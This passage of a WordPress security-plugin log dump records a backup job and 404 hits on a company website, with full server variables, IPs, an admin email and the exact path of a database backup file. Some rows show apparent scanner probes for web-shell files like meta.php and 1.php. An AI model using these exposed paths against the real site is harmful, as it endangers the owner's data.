03:28:28',19023256,76502480,'wp-cron',1,0,'103.6.198.69'),(23470,0,'backup','email-succeeded','a:5:{s:8:\"settings\";a:9:{s:9:\"all_sites\";b:0;s:6:\"method\";i:1;s:8:\"location\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups\";s:6:\"retain\";i:0;s:3:\"zip\";b:1;s:7:\"exclude\";a:2:{i:0;s:14:\"itsec_lockouts\";i:1;s:10:\"itsec_temp\";}s:7:\"enabled\";b:1;s:8:\"interval\";i:7;s:8:\"last_run\";i:1566358260;}s:12:\"mail_success\";b:1;s:4:\"file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190828-112829-LiDdaNWXWP0uT8GKe1rXY0bA7YGXXg.sql\";s:11:\"output_file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190828-112829-LiDdaNWXWP0uT8GKe1rXY0bA7YGXXg.zip\";s:4:\"size\";i:2841817;}','notice','2019-08-28 03:29:05','2019-08-28 03:28:28',22529040,76502480,'wp-cron',1,0,'103.6.198.69'),(27862,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"FE1D11A2-22FA-4141-91CD-7F8B0C03B517\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ7O4Y16ilSZVOsCMeMNwgAAAEM\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.132.144.1\";s:11:\"REMOTE_PORT\";s:5:\"49373\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ7O4Y16ilSZVOsCMeMNwgAAAEM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570688737.3705\";s:12:\"REQUEST_TIME\";s:10:\"1570688737\";}}','notice','2019-10-10 06:25:40','2019-10-10 06:25:37',35788552,37594416,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.1'),(27863,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ7PsBypZvX7@gJ12mPJMgAAAIM\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.150.124\";s:11:\"REMOTE_PORT\";s:5:\"39960\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ7PsBypZvX7@gJ12mPJMgAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1570688944.24\";s:12:\"REQUEST_TIME\";s:10:\"1570688944\";}}','notice','2019-10-10 06:29:06','2019-10-10 06:29:04',35048776,36863080,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'54.36.150.124'),(27864,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:38:\"/wp-includes/Text/Diff/Engine/meta.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"70-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"70-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"70-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:60:\"https://bintara.com.my/wp-includes/Text/Diff/Engine/meta.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:38:\"/wp-includes/Text/Diff/Engine/meta.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ7uKo16ilSZVOsCMeMnXQAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:60:\"https://bintara.com.my/wp-includes/Text/Diff/Engine/meta.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:38:\"/wp-includes/Text/Diff/Engine/meta.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ7uKo16ilSZVOsCMeMnXQAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.236.10\";s:11:\"REMOTE_PORT\";s:5:\"48590\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:60:\"https://bintara.com.my/wp-includes/Text/Diff/Engine/meta.php\";s:10:\"SCRIPT_URL\";s:38:\"/wp-includes/Text/Diff/Engine/meta.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ7uKo16ilSZVOsCMeMnXQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570696746.4101\";s:12:\"REQUEST_TIME\";s:10:\"1570696746\";}}','notice','2019-10-10 08:39:09','2019-10-10 08:39:07',35060456,36868960,'https://bintara.com.my/wp-includes/Text/Diff/Engine/meta.php',1,0,'198.71.236.10'),(27865,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:38:\"/wp-includes/Text/Diff/Engine/meta.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"402-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"402-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"402-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:60:\"https://bintara.com.my/wp-includes/Text/Diff/Engine/meta.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:38:\"/wp-includes/Text/Diff/Engine/meta.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ7uL6yUrY9zjNB4MhfBOQAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:60:\"https://bintara.com.my/wp-includes/Text/Diff/Engine/meta.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:38:\"/wp-includes/Text/Diff/Engine/meta.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ7uL6yUrY9zjNB4MhfBOQAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.236.10\";s:11:\"REMOTE_PORT\";s:5:\"49262\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:60:\"https://bintara.com.my/wp-includes/Text/Diff/Engine/meta.php\";s:10:\"SCRIPT_URL\";s:38:\"/wp-includes/Text/Diff/Engine/meta.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ7uL6yUrY9zjNB4MhfBOQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570696751.7203\";s:12:\"REQUEST_TIME\";s:10:\"1570696751\";}}','notice','2019-10-10 08:39:14','2019-10-10 08:39:12',35063416,36867448,'https://bintara.com.my/wp-includes/Text/Diff/Engine/meta.php',1,0,'198.71.236.10'),(27866,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"FDA7B766-45E4-419D-A93B-1AAF7F338825\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ8BegllZW5rbcASCZtnxAAAAUE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.132.144.1\";s:11:\"REMOTE_PORT\";s:5:\"49959\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ8BegllZW5rbcASCZtnxAAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570701690.1403\";s:12:\"REQUEST_TIME\";s:10:\"1570701690\";}}','notice','2019-10-10 10:01:31','2019-10-10 10:01:30',35397104,37200424,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.1'),(27867,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/1.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/1.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/1.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ8LahypZvX7@gJ12mPVJQAAAJU\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/1.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/1.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ8LahypZvX7@gJ12mPVJQAAAJU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"77.221.130.147\";s:11:\"REMOTE_PORT\";s:5:\"40300\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/1.php\";s:10:\"SCRIPT_URL\";s:6:\"/1.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ8LahypZvX7@gJ12mPVJQAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570704234.7688\";s:12:\"REQUEST_TIME\";s:10:\"1570704234\";}}','notice','2019-10-10 10:43:57','2019-10-10 10:43:55',35042752,36844184,'https://bintara.com.my/1.php',1,0,'77.221.130.147'),(27870,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/toughpad-fz-g1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-g1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/toughpad-fz-g1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ842BypZvX7@gJ12mPdvwAAAJA\";s:12:\"REDIRECT_URL\";s:16:\"/toughpad-fz-g1/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.141\";s:11:\"REMOTE_PORT\";s:5:\"28791\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-g1/\";s:10:\"SCRIPT_URL\";s:16:\"/toughpad-fz-g1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\